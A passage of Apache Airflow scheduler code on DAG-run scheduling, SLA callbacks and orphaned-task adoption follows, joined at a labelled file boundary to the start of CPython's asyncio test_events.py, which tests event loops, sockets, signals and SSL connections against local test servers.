active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
# Get the DAG in a try/except so that a missing Serialized DAG does not stop the Scheduler
# This takes care of Dynamic DAGs especially
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
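# Gating example (hypothetical): with max_active_runs=2 and two RUNNING,
# non-externally-triggered runs already counted, next_dagrun_create_after is
# cleared so no further run is created until one finishes; otherwise both
# fields advance via dag.next_dagrun_info(dag_model.next_dagrun).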
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Set of execution dates of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.set_state(State.FAILED)
unfinished_task_instances = (
session.query(TI)
.filter(TI.dag_id == dag_run.dag_id)
.filter(TI.execution_date == dag_run.execution_date)
.filter(TI.state.in_(State.unfinished))
)
for task_instance in unfinished_task_instances:
task_instance.state = State.SKIPPED
session.merge(task_instance)
session.flush()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
# Work out whether we should allow creating a new DagRun now
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED]) # type: ignore
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING]) # type: ignore
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstances still in the QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
for attempt in run_with_db_retries(logger=self.log):
with attempt:
self.log.debug(
"Running SchedulerJob.adopt_or_reset_orphaned_tasks with retries. Try %d of %d",
attempt.retry_state.attempt_number,
MAX_DB_RETRIES,
)
self.log.debug("Calling SchedulerJob.adopt_or_reset_orphaned_tasks method")
try:
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre-upgrade. This (and the
# "or queued_by_job_id IS NULL") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset),
task_instance_str,
)
# Issue SQL/finish "Unit of Work", but let @provide_session
# commit (or if passed a session, let caller decide when to commit
session.flush()
except OperationalError:
session.rollback()
raise
return len(to_reset)
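# Partition sketch for the method above: the executor keeps ("adopts") the
# TIs it can still track and returns the rest; returned TIs are reset to
# state NONE with queued_by_job_id cleared, while adopted TIs are stamped
# with this job's id so other schedulers leave them alone.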
|
test_events.py | """Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
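# This helper is intended to run in a spawned subprocess (the driving test is
# outside this excerpt): it builds a fresh event loop, installs it, and runs
# a trivial coroutine to prove the loop machinery works in a new process.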
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
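# MyBaseProto's state machine, for reference: INITIAL -> CONNECTED on
# connection_made, optionally CONNECTED -> EOF on eof_received, then CLOSED
# on connection_lost; when a loop is supplied, tests can await the
# transitions, e.g. loop.run_until_complete(proto.connected).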
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
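# The Lock handshake above enforces ordering: the main thread holds the lock
# until the worker has scheduled 'hello' via call_soon_threadsafe, so 'world'
# is only scheduled afterwards and the result list is deterministic.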
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in non-blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Let the OS pick an unused port by binding to port 0, then close the
# socket so the connect below is (almost certainly) refused.
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
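# setitimer() with an interval of 0 delivers SIGALRM exactly once. The
# signal arrives while the loop is blocked in select(); the wakeup byte
# written to the loop's self-pipe is what forces select() to return so
# the handler callback can run.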
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX sockets.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except OSError:
pass
else:
break
else:
assert False, 'Cannot create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
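# For SSL transports, get_extra_info() mirrors the underlying ssl object:
# 'cipher' is the (name, protocol_version, secret_bits) 3-tuple from
# SSLObject.cipher(), 'peercert' comes from getpeercert(), and
# 'ssl_object' exposes the SSLObject (or the SSLSocket on the legacy path).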
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIn('ssl', tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX sockets.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
